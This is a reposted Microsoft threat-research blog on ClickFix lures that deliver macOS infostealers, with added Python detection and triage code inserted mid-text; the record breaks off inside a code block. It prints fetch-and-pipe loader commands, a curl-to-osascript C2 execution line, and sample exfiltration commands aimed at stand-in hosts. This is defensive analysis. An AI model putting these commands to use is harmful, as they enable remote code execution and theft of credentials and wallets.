{"id":51748,"date":"2026-05-06T12:30:58","date_gmt":"2026-05-06T12:30:58","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=51748"},"modified":"2026-05-06T12:30:58","modified_gmt":"2026-05-06T12:30:58","slug":"clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=51748","title":{"rendered":"ClickFix campaign uses fake macOS utilities lures to deliver infostealers_MSSECURE:B9774A5238ABF9F8F6DE190012C0F965"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-06T16:58:39&#8243;,&#8221;description&#8221;:&#8221;Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix\u2011style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites. \\n\\nThese commands, which are purported to install system utilities, load an infostealing malware like Macsync, Shub Stealer, and AMOS into the targets\u2019 devices instead. The malware then collects and exfiltrates data, including media files, iCloud data and Keychain entries, and cryptocurrency wallets. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at an added security risk. \\n\\nPrior iterations of this campaign delivered the infostealers through disk image (_.dmg_) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script\u2011based loader execution. 
\\n\\nUnlike application bundles opened through Finder\u2014which might be subjected to Gatekeeper verification checks such as code signing and notarization\u2014scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don\u2019t undergo the same evaluation: content fetched by curl and piped straight into an interpreter never receives the quarantine attribute that triggers those checks. This delivery mechanism enables attackers to initiate malware execution through user\u2011driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.\\n\\nIn this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.\\n\\n## Activity overview\\n\\n### Initial access\\n\\nStandalone websites were seen hosting pages that included a Base64-encoded instruction for end users to run. Some sites present this information in multiple languages. As of this writing, the websites we\u2019ve observed are either already down or have been reported.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-33.webp)Figure 1: Landing page of a script campaign (domenpozh[.]net) ![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-32.webp)Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com. ![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-31.webp)Figure 3. mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.\\n\\nIn other instances, instructions leading to malware were observed hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. 
We\u2019ve observed that pages like _macclean[.]craft[.]me_ were taken down relatively quickly.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-30.webp)Figure 4. ClickFix instruction hosted on macclean[.]craft[.]me.\\n\\nThreat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as _macos-disk-space[.]medium[.]com_ instruct users to \u201cfix\u201d an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.\\n\\nWe observed three distinct execution paths leveraging different infrastructure. We\u2019re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as random IDs) was used in data staging, marking the staging folders as \/tmp\/shub_\\u003crandom ID\\u003e or \/tmp\/\\u003crandom ID\\u003e.\\n\\nThe underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.\\n\\nThe following table summarizes the key differences between the campaigns. 
We discuss the details of each of these campaigns in the succeeding sections of this blog.\\n\\n**Activity or technique**| **Loader campaign**| **Script campaign**| **Helper campaign**  \\n&#8212;|&#8212;|&#8212;|&#8212;  \\nInitial installation| No file written on disk| No file written on disk| \/tmp\/helper or \/tmp\/update  \\nCondition to exit execution| Russian keyboard detected| Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail)| Sandbox detected  \\nData staging| \/tmp\/shub_\\u003crandom ID\\u003e, \/tmp\/out.zip| None| \/tmp\/\\u003crandom ID\\u003e, \/tmp\/out.zip  \\nPersistence (plist file created)| ~\/Library\/LaunchAgents\/com.google.keystone.agent.plist| ~\/Library\/LaunchAgents\/com.\\u003crandom value\\u003e.plist| \/Library\/LaunchDaemons\/com.finder.helper.plist  \\nBot execution| **Payload:** _GoogleUpdate_; **C2 pattern:** _\\u003cC2 domain\\u003e\/api\/bot\/heartbeat_| Resolves active C2 through hardcoded infrastructure, with a Telegram fallback (**dead drop:** _hxxps:\/\/t[.]me\/ax03bot_)| **Payload:** _~\/.agent_; **C2:** _hxxp:\/\/45.94.47[.]204\/api\/_  \\nExfiltration| \\u003cC2 domain\\u003e\/api\/debug\/event, \\u003cC2 domain\\u003e\/gate\/chunk| \\u003cC2 domain\\u003e\/upload.php| \\u003cC2 domain\\u003e\/contact  \\nTrojanized cryptocurrency apps| Trezor Suite.app, Ledger Wallet.app, Exodus.app| Not applicable (handled in later loader\/payload stages)| Trezor Suite.app, Ledger Wallet.app  \\n  \\n### Loader install campaign\\n\\nSince February 2026, Microsoft researchers have observed a campaign that requests a loader shell script from the attacker\u2019s infrastructure using curl once a user copies and runs ClickFix commands in Terminal. It leads to further execution of a second-stage shell script. \\n\\nThis second shell script is a _zsh_ loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. 
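Both the ClickFix commands in the Initial access section and the zsh loader above work by wrapping Base64 (and, for the loader, gzip) around a stage that fetches remote content and hands it to an interpreter. The Python below is an added triage example, not code from this post or from the malware: it peels those layers statically, without executing anything or touching the network, and reports the fetch-and-pipe, osascript, eval and gunzip indicators it finds. The sample commands are constructed for the example and point at example.invalid, a reserved domain that never resolves.

```python
"""Static peeler for ClickFix-style Terminal commands and Base64+gzip shell loaders.
Added example, not code from the Microsoft post. Nothing is executed and no
network access happens; sample commands are constructed and use example.invalid."""
import base64
import gzip
import re
import zlib

FETCHERS = ("curl", "wget")                          # native download tools abused in the chain
INTERPRETERS = {"sh", "bash", "zsh", "osascript"}    # what fetched content gets piped into
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
PIPE_TARGET = re.compile(r"\|\s*(?:/usr/bin/|/bin/)?(\w+)")


def decode_layer(blob: str):
    """Decode one Base64 blob; gunzip it transparently if it starts with the gzip magic."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    if raw[:2] == b"\x1f\x8b":
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\n\r\t" for c in text) else None


def peel(text: str, max_depth: int = 5) -> list:
    """Return [outer, stage2, ...], decoding each layer's longest Base64 blob in turn.
    Descends only when the layer itself calls base64, which mirrors the observed
    `echo <blob> | base64 -d | sh` and `eval "$(echo <blob> | base64 -d | gunzip)"` forms
    and keeps random tokens or hashes from being misread as a stage."""
    layers = [text]
    for _ in range(max_depth):
        current = layers[-1]
        if "base64" not in current:
            break
        blobs = sorted(B64_BLOB.findall(current), key=len, reverse=True)
        decoded = next((d for d in map(decode_layer, blobs) if d), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def defang(url: str) -> str:
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def triage(command: str) -> dict:
    """Peel every layer of a pasted command or captured loader and report indicators."""
    layers = peel(command)
    urls, reasons = set(), []
    for layer in layers:
        urls.update(URL_RE.findall(layer))
        fetches = any(f in layer for f in FETCHERS)
        if fetches and any(m.group(1) in INTERPRETERS for m in PIPE_TARGET.finditer(layer)):
            reasons.append("remote content piped straight into an interpreter")
        if fetches and "osascript" in layer:       # covers osascript -e "$(curl ...)" with no pipe
            reasons.append("osascript executes fetched content")
        if len(layers) > 1 and re.search(r"\beval\b", layer):
            reasons.append("eval of a decoded payload")
        if len(layers) > 1 and re.search(r"\bgunzip\b|gzip\s+-d", layer):
            reasons.append("gzip-compressed embedded stage")
    return {
        "depth": len(layers) - 1,                   # encoding layers peeled
        "urls": sorted(defang(u) for u in urls),
        "reasons": sorted(set(reasons)),
        "final_stage": layers[-1],
        "verdict": "suspicious" if reasons else "no ClickFix indicators",
    }


# Constructed samples (not real campaign artifacts).
_STAGE2 = "curl -fsSL https://example.invalid/loader.sh?build=test | sh"
SAMPLE_CLICKFIX = "echo %s | base64 -d | sh" % base64.b64encode(_STAGE2.encode()).decode()
_PAYLOAD = 'osascript -e "$(curl -fsSL https://example.invalid/payload.applescript?build=test)"'
SAMPLE_LOADER = '#!/bin/zsh\neval "$(echo %s | base64 -d | gunzip)"\n' % base64.b64encode(
    gzip.compress(_PAYLOAD.encode())).decode()
SAMPLE_BENIGN = "sudo du -sh ~/Library/Caches/*"
```

`triage()` takes either the text a user was told to paste or a script fetched by the first stage; `final_stage` is the innermost decoded text to hand on to further analysis, and the defanged `urls` list is what goes into a blocklist or hunting query.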
The loader then executes the decoded payload using _eval_.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-29.webp)Figure 5: Shell loader.\\n\\nThe next-stage script also functions as a macOS reconnaissance and execution\u2011control loader that first fingerprints the system by collecting the following information:\\n\\n  * Keyboard locale\\n  * Hostname\\n  * Operating system version\\n  * External IP address\\n\\n\\n\\nIt then builds and sends a JSON object to an attacker\u2011controlled server containing an event name (_loader_requested_ or _cis_blocked_) along with this telemetry. It also uses the presence of Russian\/CIS keyboard layouts as a deliberate kill switch, reporting a _cis_blocked_ event and stopping execution.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-14.webp)Figure 6: Reconnaissance loader with CIS kill switch.\\n\\nIf the system isn\u2019t blocked, the script silently beacons a _loader_requested_ event and then downloads and executes a remote AppleScript payload directly in memory using osascript.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-13.webp)Figure 7: Reconnaissance loader with AppleScript payload delivery.\\n\\n### AppleScript infostealer\\n\\nThis multi-stage macOS AppleScript stealer employs user interaction-based credential capture, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. 
The malware further tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.\\n\\n#### Data collection: \/tmp\/shub_\\u003crandom ID\\u003e staging\\n\\nWe observed that the stealer self-identifies as \u201cSHub Stealer\u201d (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a \u201chelper\u201d utility. It then validates the entered password locally with _dscl . -authonly \\u003cusername\\u003e \\u003cpassword\\u003e_, which succeeds only for the correct password. Upon successful validation, it sends a _password_obtained_ event to its C2 infrastructure.\\n\\nThe malware stages collected data under a \/tmp\/shub_\\u003crandom ID\\u003e\/ folder. The collected data includes:\\n\\n  * Browser credentials\\n  * Notes\\n  * Media files\\n  * Telegram data\\n  * Cryptocurrency wallets\\n  * Keychain entries\\n  * iCloud account data\\n\\n\\n\\nThe stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at \/tmp\/shub_\\u003crandom ID\\u003e\/FileGrabber\/.\\n\\nThe targeted file types are:\\n\\n  * txt\\n  * pdf\\n  * docx\\n  * wallet\\n  * key\\n  * keys\\n  * doc\\n  * jpeg\\n  * png\\n  * kdbx\\n  * rtf\\n  * jpg\\n  * seed\\n\\n\\n\\nOnce the data collection is complete, data is compressed and exfiltrated. 
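The sequence just described, a local dscl password check, data staged under \/tmp\/shub_\u003crandom ID\u003e, an archive, then a curl POST, is also what the helper campaign leaves behind (with \/tmp\/\u003crandom ID\u003e and the \/contact endpoint), and it is exactly the native-tool chain the mitigation guidance later in this post asks you to alert on. The Python below is an added detection example, not Microsoft's hunting logic: it correlates those stages per user inside a time window over constructed process-telemetry lines whose format is invented for the example. The C2 paths it matches are the ones in the campaign table above; the hostnames in the sample log are reserved .invalid names.

```python
"""Correlate the living-off-the-land chain these stealers leave in process telemetry:
dscl password check -> archive built from a /tmp staging folder -> curl upload to a
known exfil path. Added detection example, not Microsoft's hunting logic. The log
format and every line in SAMPLE_LOG are constructed for this example."""
import re
from datetime import datetime, timedelta

# Staging folders from the loader and helper campaigns: /tmp/shub_<7 digits>, /tmp/<7 digits>
STAGING_DIR = re.compile(r"/tmp/(?:shub_)?\d{7}\b")
ARCHIVE_TOOL = re.compile(r"^(?:\S*/)?(?:zip|ditto|tar)\b")
EXFIL_PATH = re.compile(r"/(?:upload\.php|contact|gate/chunk|debug/event)\b")
UPLOAD_FLAG = re.compile(r"(?:\s-F\s|\s-d\s|--data(?:-binary)?\b|-X\s*POST)")
LINE = re.compile(r'^(?P<ts>\S+) user=(?P<user>\S+) pid=(?P<pid>\d+) cmd="(?P<cmd>.*)"$')


def parse(lines):
    """Parse the constructed log format into event dicts with datetime timestamps."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return events


def stage_of(cmd: str):
    """Map one command line to a stage of the chain, or None if it is not part of it."""
    if re.search(r"\bdscl\b.*\s-authonly\b", cmd):
        return "password_validated"
    if ARCHIVE_TOOL.match(cmd) and STAGING_DIR.search(cmd):
        return "staged_archive"
    if re.search(r"\bcurl\b", cmd) and EXFIL_PATH.search(cmd) and UPLOAD_FLAG.search(cmd):
        return "posted_archive"
    return None


def correlate(events, window=timedelta(minutes=15)):
    """One alert per user whose staged archive is uploaded within `window`.
    Severity is high when a dscl password check preceded the staging in the window."""
    tagged = [(stage_of(e["cmd"]), e) for e in sorted(events, key=lambda e: e["ts"])]
    tagged = [(s, e) for s, e in tagged if s]
    alerts = []
    for user in sorted({e["user"] for _, e in tagged}):
        seq = [(s, e) for s, e in tagged if e["user"] == user]
        for i, (stage, anchor) in enumerate(seq):
            if stage != "staged_archive":
                continue
            post = next((e for s, e in seq[i + 1:]
                         if s == "posted_archive" and e["ts"] - anchor["ts"] <= window), None)
            if post is None:
                continue
            creds = [e for s, e in seq[:i]
                     if s == "password_validated" and anchor["ts"] - e["ts"] <= window]
            alerts.append({
                "user": user,
                "severity": "high" if creds else "medium",
                "staging": STAGING_DIR.search(anchor["cmd"]).group(0),
                "chain": [e["cmd"] for e in creds[-1:]] + [anchor["cmd"], post["cmd"]],
            })
            break
    return alerts


# Constructed telemetry: alice mirrors the loader stealer, carol the helper stealer
# without a credential prompt, bob is an ordinary backup; .invalid hosts never resolve.
SAMPLE_LOG = """\
2026-04-02T10:14:02Z user=alice pid=611 cmd="dscl . -authonly alice hunter2"
2026-04-02T10:14:09Z user=alice pid=618 cmd="ditto -c -k --sequesterRsrc /tmp/shub_4817263 /tmp/out.zip"
2026-04-02T10:14:11Z user=alice pid=623 cmd="curl -s -X POST -F file=@/tmp/out.zip https://c2.example.invalid/upload.php"
2026-04-02T10:14:12Z user=alice pid=630 cmd="rm -rf /tmp/shub_4817263 /tmp/out.zip"
2026-04-02T11:02:40Z user=bob pid=801 cmd="zip -r /tmp/project-backup.zip /Users/bob/project"
2026-04-02T11:03:01Z user=bob pid=805 cmd="curl -T /tmp/project-backup.zip https://backup.example.invalid/contact"
2026-04-02T12:30:00Z user=carol pid=910 cmd="zip -r -q /tmp/out.zip /tmp/5129034"
2026-04-02T12:30:04Z user=carol pid=915 cmd="curl -s -X POST --data-binary @/tmp/out.zip https://c2.example.invalid/gate/chunk"
"""
```

Requiring the seven-digit staging folder is what keeps bob's backup upload out of the alert set even though it hits a path named \/contact; the window is the knob to tune against your own telemetry, since a dscl check many minutes before an archive is more likely an unrelated login than the stealer's prompt.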
The stealer deletes staging artifacts to reduce forensic evidence.\\n\\n#### Wallet exfiltration and trojanization\\n\\nSubsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:\\n\\n  * Electrum\\n  * Coinomi\\n  * Exodus\\n  * Atomic\\n  * Wasabi\\n  * Ledger Live\\n  * Monero\\n  * Bitcoin\\n  * Litecoin\\n  * DashCore\\n  * lectrum_LTC\\n  * Electron_Cash\\n  * Guarda\\n  * Dogecoin\\n  * Trezor_Suite\\n  * Sparrow\\n\\n\\n\\nWhen it finds any of these applications, it stages their data for exfiltration.\\n\\nThe stealer was also observed replacing legitimate cryptocurrency wallet apps with attacker-controlled or trojanized ones:\\n\\n  * _Ledger Wallet.app_ is replaced by _app.zip_ fetched from _\\u003cC2 domain\\u003e\/zxc\/app.zip_\\n  * _Trezor Suite.app_ is replaced by _apptwo.zip_ fetched from _\\u003cC2 domain\\u003e\/zxc\/apptwo.zip_\\n  * _Exodus.app_ is replaced by _appex.zip_ fetched from _\\u003cC2 domain\\u003e\/zxc\/appex.zip_\\n\\n\\n\\nThese trojanized cryptocurrency wallet applications pose a serious risk to users who, unaware of the swap, continue to use and transact with them.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-28.webp)Figure 8. Trojanized apps installation.\\n\\n### Persistence\\n\\nFor persistence, the malware creates an additional script within the newly created _~\/Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/_ folder.\\n\\nA malicious implant named _GoogleUpdate_ is configured to run at load (_RunAtLoad_), disguised as Google\u2019s legitimate Keystone update agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS\/SuspMalScript.\\n\\nA new property list (plist), _\/Library\/LaunchAgents\/com.google.keystone.agent.plist_, is then staged to run this agent.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-27.webp)Figure 9. 
Plist staging.\\n\\nThe executable is then given permission to run with the following command:\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-26.webp)Figure 10. _GoogleUpdate_ granted permission to run.\\n\\nOnce _com.google.keystone.agent.plist_ loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at _\\u003cC2 domain\\u003e\/api\/bot\/heartbeat_, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.\\n\\nThe C2 server can return Base64-encoded instructions, which the script decodes, executes locally, and then removes the traces of, enabling remote command execution on demand. This process creates a persistent remote-control channel through which the attacker can push arbitrary shell commands to the infected device at any time.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-25.webp)Figure 11. Backdoor-style bot with heartbeat-driven payload execution.\\n\\n### Script install campaign\\n\\nIn April 2026, Microsoft researchers observed an ongoing campaign that runs a heavily obfuscated infostealer once users paste and run its ClickFix command in Terminal.\\n\\nThe attack begins with a social\u2011engineering instruction containing a Base64\u2011encoded command.\\n\\nWhen decoded, this instruction resolves to a one\u2011line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-12.webp)Figure 12. 
Payload delivery.\\n\\nThe retrieved _script.sh_ payload is launched directly from the network stream, with no intermediate file written to disk. It\u2019s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64-encoded script inside a plist staged at _~\/Library\/LaunchAgents\/com.\\u003crandom name\\u003e.plist_.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-24.webp)Figure 13. Payload staged into a plist.\\n\\nThe persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-23.webp)Figure 14. AppleScript stager (decoded).\\n\\nThis AppleScript functions as a C2 discovery and execution orchestrator for a macOS malware campaign. AppleScript serves as the control layer, with standard Unix tools handling network interaction and execution. Its first role is C2 discovery. It iterates over a list of potential server identifiers (for example _{0x666[.]info}_), constructs candidate URLs (_http:\/\/\\u003cvalue\\u003e\/_), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (_-d \"check\"_). This connectivity test is performed through the following command:\\n\\n\/usr\/bin\/curl -s -H \"\\u003cUser-Agent\\u003e\" -d \"check\" --connect-timeout 5 --max-time 10 \\u003ccandidate_url\\u003e\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-22.webp)Figure 15. Initial C2 communication.\\n\\nIf none of the hard\u2011coded infrastructure responds successfully, the script falls back to Telegram\u2011based C2 discovery. 
It fetches a Telegram bot page using _curl -s hxxps:\/\/t[.]me\/ax03bot_ and extracts a hidden server identifier embedded in an HTML _\\u003cspan dir=\"auto\"\\u003e_ element using _sed_. This lets the attacker rotate C2 infrastructure dynamically without touching the implant.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-21.webp)Figure 16. Telegram-based C2 endpoint discovery.\\n\\nOnce a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (_txid_) and a module identifier, then immediately pipes the server response into osascript for execution:\\n\\ncurl -s -X POST \\u003cC2_URL\\u003e -H \"\\u003cUser-Agent\\u003e\" -d \"\\u003ctxid\\u003e\\u0026module\" | osascript\\n\\nThis command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds once a connectivity check succeeds. Overall, this isn\u2019t a simple downloader but a resilient, infrastructure\u2011aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker\u2011controlled AppleScript logic on demand.\\n\\nWe observed data exfiltration to the attacker&#8217;s infrastructure on a _\\u003cC2 domain\\u003e\/upload.php_ endpoint leveraging curl.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-20.webp)Figure 17. Exfiltration of archived data.\\n\\n### Helper install campaign (AMOS)\\n\\nStarting at the end of January 2026, another ClickFix campaign relied on an executable file named _helper_ or _update_ to run. 
In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed the payload using gunzip.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-34.webp)Figure 18. First-stage script requested.\\n\\nThe first-stage script led to the retrieval of the second-stage malicious Mach-O executable into the newly created _\/tmp\/\\u003cfile name\\u003e_ folder.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-1.jpg)Figure 19. \/tmp\/helper installation.\\n\\nIn February 2026, this campaign retrieved the payload under a _\/tmp\/update_ folder.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-35.webp)Figure 20. \/tmp\/update installation.\\n\\nThis malicious executable has its extended attributes stripped (which removes any quarantine flag) and is then marked executable and launched on the victim\u2019s device.\\n\\n### Virtualization detection\\n\\nThe infection chain begins with an AppleScript-based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking _system_profiler_ and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:\\n\\n  * Chip: Unknown\\n  * Intel Core 2\\n  * Virtual Machine\\n  * VirtualMac\\n\\n\\n\\nIf any of these indicators are present, execution is terminated early, preventing further stages from running.\\n\\n### Data collection and exfiltration\\n\\nLike the loader install campaign, the stealer prompts the user to enter their password. 
It validates locally whether the entered password is correct using the _dscl_ utility.\\n\\nAfter capturing the target user\u2019s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies the macOS Keychain databases, enabling access to stored website passwords, application secrets, and Wi-Fi credentials; the captured login password is what unlocks the login keychain offline.\\n\\nIt also collects browser authentication material from Chromium\u2011based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser\u2011based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.\\n\\nThe stealer compresses collected data into a ZIP file, _\/tmp\/out.zip_, which is then exfiltrated to a _\\u003cC2 domain\\u003e\/contact_ endpoint. The stealer removes staging artifacts to reduce forensic evidence.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-36.webp) ![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-19.webp)Figure 21. 
Archiving and exfiltration of data.\\n\\n#### Wallet exfiltration and trojanization\\n\\nSimilar to the loader campaign, the stealer in the helper campaign also replaces legitimate wallet apps with attacker-controlled ones:\\n\\n  * _Ledger Wallet.app_ is replaced by _app.zip_ fetched from _\\u003cC2 domain\\u003e\/zxc\/app.zip_\\n  * _Trezor Suite.app_ is replaced by _apptwo.zip_ fetched from _\\u003cC2 domain\\u003e\/zxc\/apptwo.zip_\\n\\n\\n\\n### Backdoor deployment and persistence\\n\\nTo maintain long\u2011term access to infected systems, the helper campaign deploys a multi\u2011stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.\\n\\n#### Download and execution of the backdoor component (.mainhelper)\\n\\nThe persistence chain begins with the download of a second\u2011stage backdoor implant named _.mainhelper_ into the current user\u2019s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach\u2011O executable from an attacker-controlled endpoint (_\\u003cC2 domain\\u003e\/zxc\/kito_) and writes it as a hidden file under the user profile.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-18.webp)Figure 22. Second implant downloaded.\\n\\nOnce its extended attributes are stripped and it is marked executable, the _~\/.mainhelper_ implant registers the compromised device with the C2 endpoint _hxxp:\/\/45.94.47[.]204\/api\/_. The implant executes tasks from the attacker, providing remote-control capability over the compromised system.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-17.webp)Figure 23. C2 instance.\\n\\n#### Creation of the execution wrapper (.agent)\\n\\nIn addition to the backdoor binary, the stealer creates a secondary file named _.agent_, also placed in the user\u2019s home directory. 
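Persistence in these campaigns is a launchd plist that looks routine at a glance: in the loader campaign, a LaunchAgent labelled like Google's Keystone updater that actually runs a GoogleUpdate binary out of Application Support; here, the LaunchDaemon com.finder.helper.plist described in the following subsections, which has root run \/bin\/bash on a hidden script in the victim's home directory. The Python below is an added audit example, not Microsoft's detection logic: it parses a plist and reports the traits that separate these from legitimate agents. The sample plists are constructed to mirror the two cases, and the directory assumed for genuine Keystone agents is an assumption of the example rather than something the post states.

```python
"""Audit launchd plists for the masquerading persistence these campaigns install.
Added example, not Microsoft's detection logic. Sample plists are constructed; the
Keystone install directory used for the impersonation check is an assumption."""
import plistlib
import re

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript"}
HIDDEN = re.compile(r"/\.[^/]+$")            # final path component starts with a dot
# Assumption: genuine Keystone agents execute from under this directory.
VENDOR_LABELS = {"com.google.keystone": "/Library/Google/GoogleSoftwareUpdate/"}


def user_home_path(p: str) -> bool:
    return p.startswith(("/Users/", "~/"))


def audit(plist_path: str, data: bytes) -> list:
    """Return human-readable findings for one plist; an empty list means nothing suspicious."""
    plist = plistlib.loads(data)                 # accepts XML and binary plists
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    if not args:
        return ["no Program or ProgramArguments"]
    exe, rest = args[0], args[1:]
    findings = []
    hidden = [a for a in rest if user_home_path(a) and HIDDEN.search(a)]
    if exe in SHELLS and hidden:                 # /bin/bash ~/.agent pattern
        findings.append(f"{exe} runs hidden user-home script {hidden[0]}")
    if plist_path.startswith("/Library/LaunchDaemons/") and any(user_home_path(a) for a in args):
        findings.append("LaunchDaemon (root) executes a path under a user home directory")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: relaunched immediately if killed")
    for prefix, expected_dir in VENDOR_LABELS.items():
        if label.startswith(prefix) and expected_dir not in exe:
            findings.append(f"label {label} impersonates {prefix} but runs {exe}")
    return findings


def make_plist(label, args, run_at_load=True, keep_alive=False) -> bytes:
    """Build an XML launchd plist (helper used only to construct the samples below)."""
    return plistlib.dumps({"Label": label, "ProgramArguments": list(args),
                           "RunAtLoad": run_at_load, "KeepAlive": keep_alive})


# Constructed samples mirroring the two persistence mechanisms in the post.
DAEMON_SAMPLE = ("/Library/LaunchDaemons/com.finder.helper.plist",
                 make_plist("com.finder.helper", ["/bin/bash", "/Users/alice/.agent"], keep_alive=True))
AGENT_SAMPLE = ("/Users/alice/Library/LaunchAgents/com.google.keystone.agent.plist",
                make_plist("com.google.keystone.agent",
                           ["/Users/alice/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"]))
BENIGN_SAMPLE = ("/Library/LaunchDaemons/com.example.backup.plist",
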